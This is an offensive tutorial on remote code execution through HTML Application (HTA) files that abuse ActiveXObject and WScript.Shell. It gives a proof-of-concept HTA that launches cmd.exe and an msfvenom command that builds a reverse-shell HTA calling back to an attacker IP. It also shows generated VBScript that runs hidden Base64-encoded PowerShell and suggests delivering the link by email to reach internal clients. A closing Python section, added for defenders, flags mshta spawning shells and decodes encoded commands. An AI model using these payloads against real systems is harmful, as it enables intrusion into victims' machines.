# ActiveXObject to Wscript RCE

In this example, we leverage ActiveXObjects, which can (dangerously) provide access to underlying operating system commands. This is done through the Windows Script Host (WScript) functionality, in particular the Windows Script Host Shell object. Once we instantiate a Windows Script Host Shell object, we can invoke its Run method to launch an application on the target client machine.

--------------------poc.hta--------------------

```html
<html>
<head>
<script>
// Instantiate the Windows Script Host Shell object and use its Run method to launch cmd.exe
var c = 'cmd.exe';
new ActiveXObject('WScript.Shell').Run(c);
// Close the HTA window once the process has been launched
self.close();
</script>
</head>
</html>
```

We can save this and serve it with Apache. Opening it will launch cmd on the user's computer. The user will first be prompted with:

![](/files/b6yxuav9RxM7v5YrHedG)

Then, if they click to open it, they will get:

![](/files/wNgspcmvTbiPYbRuSBh1)

This second message appears when the Internet Explorer sandbox "Protected Mode" is turned on (the default).
mshta.exe will also have its own cmd prompt open, which is why we close it after we launch our window/process.

**RCE:**

$ `msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta`

The `hta-psh` format is "HTA to PowerShell": the generated HTA launches PowerShell with the following flags:

* `-nop` is shorthand for `-NoProfile`, which instructs PowerShell not to load the PowerShell user profile. When PowerShell is started, it will, by default, load any existing user's profile scripts, which might negatively impact the execution of our code.
* `-w hidden` is shorthand for `-WindowStyle hidden`.
* `-e` (shorthand for `-EncodedCommand`) allows us to supply a Base64 encoded PowerShell script directly as a command line argument.

----------------- evil.hta -----------------

```html
<html>
<head>
<script language="VBScript">
window.moveTo -4000, -4000
Set iKqr8BWFyuiK = CreateObject("Wscript.Shell")
Set t6tI2tnp = CreateObject("Scripting.FileSystemObject")
' Locate powershell.exe relative to each PSModulePath entry, then run the encoded payload
For each path in Split(iKqr8BWFyuiK.ExpandEnvironmentStrings("%PSModulePath%"),";")
If t6tI2tnp.FileExists(path + "\..\powershell.exe") Then
iKqr8BWFyuiK.Run "powershell.exe -nop -w hidden -e PUT_YOUR_BASE64_ENCODED_COMMAND_HERE"
End If
Next
</script>
</head>
<body>
<script>
self.close();
</script>
</body>
</html>
```

-----------------------Then open a listener and wait for the user to trigger it -----------------

Since the link to the HTML Application can be delivered via email, we can even compromise NAT'd internal clients.
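From the defender's side, the chain above leaves a distinctive process-creation footprint: mshta.exe spawning cmd.exe or powershell.exe, with the hta-psh flags `-nop -w hidden -e` on the command line. The following is an added example (not code from the original page) that checks constructed Sysmon-style process events for that pattern and decodes the `-EncodedCommand` payload (UTF-16LE, then Base64) so it can be inspected; the event field names and sample paths are assumptions.

```python
import base64
import ntpath

def encode_powershell_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the script carried by -e / -ec / -enc / -EncodedCommand, or None."""
    tokens = cmdline.split()
    for tok, nxt in zip(tokens, tokens[1:]):
        flag = tok.lstrip("-/").lower()
        if flag in ("e", "ec") or (len(flag) >= 3 and "encodedcommand".startswith(flag)):
            try:
                return base64.b64decode(nxt, validate=True).decode("utf-16-le")
            except ValueError:  # flag present, but the payload is not valid Base64/UTF-16LE
                return None
    return None

def hidden_window(cmdline: str) -> bool:
    """True for -w hidden, -win hidden or -WindowStyle hidden (any prefix PowerShell accepts)."""
    tokens = cmdline.lower().split()
    return any(len(t) > 1 and t[0] == "-" and "windowstyle".startswith(t[1:]) and n == "hidden"
               for t, n in zip(tokens, tokens[1:]))

def analyze(event: dict) -> list:
    """Reasons a process-creation event matches the HTA -> WScript.Shell -> shell pattern."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    reasons = []
    if parent == "mshta.exe" and child in ("cmd.exe", "powershell.exe", "pwsh.exe"):
        reasons.append("mshta.exe spawned " + child)
    if child in ("powershell.exe", "pwsh.exe"):
        if hidden_window(event["CommandLine"]):
            reasons.append("hidden PowerShell window")
        decoded = decode_encoded_command(event["CommandLine"])
        if decoded is not None:
            reasons.append("encoded command: " + decoded)
    return reasons

# Constructed records shaped like Sysmon Event ID 1 (process creation); not real telemetry.
MSHTA = r"C:\Windows\System32\mshta.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = encode_powershell_command("Write-Output 'constructed sample'")
SAMPLE_EVENTS = [
    {"ParentImage": MSHTA, "Image": PS, "CommandLine": "powershell.exe -nop -w hidden -e " + ENCODED},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"ParentImage": MSHTA, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]
```

Running `analyze()` over `SAMPLE_EVENTS` flags the first and third records (mshta.exe launching PowerShell with a hidden window and an encoded command, and mshta.exe launching cmd.exe) and leaves the ordinary `-File` invocation from explorer.exe alone.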
